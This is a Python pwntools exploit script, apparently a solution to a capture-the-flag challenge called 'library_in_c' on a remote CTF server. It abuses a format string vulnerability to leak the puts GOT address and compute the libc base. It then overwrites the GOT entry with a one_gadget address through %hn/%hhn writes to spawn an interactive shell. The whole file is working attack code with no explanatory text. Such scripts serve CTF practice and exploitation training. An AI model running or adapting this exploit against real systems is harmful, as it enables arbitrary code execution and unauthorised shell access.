```
from pwn import *

#r=process('library_in_c')
r=remote('shell.actf.co', 20201)

#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc.so.6')
elf=ELF('library_in_c')

puts_got = elf.got['puts']

r.sendlineafter('name?', '%9$saaaa' + p64(puts_got))

r.recvuntil('there ')

puts_adr = u64(r.recvuntil('aaaa')[:-4].ljust(8, '\x00'))

print hex(puts_adr)

offset = puts_adr - libc.symbols['puts']

one_gadget = offset + 0x4526a

print hex(offset)

print hex(one_gadget)

raw_input()

low_word = one_gadget & 0xffff
high_byte= (one_gadget & 0xff0000)>>16
hign_byte_need = ((256 - low_word%256)+high_byte)&0xff
print hex(hign_byte_need)
r.sendlineafter('check out?', ('%'+str(low_word)+'c'+'%20$hn'+'%'+str(hign_byte_need)+'c'+'%21$hhn').ljust(32,'a')+p64(puts_got)+p64(puts_got+2))

r.interactive()
```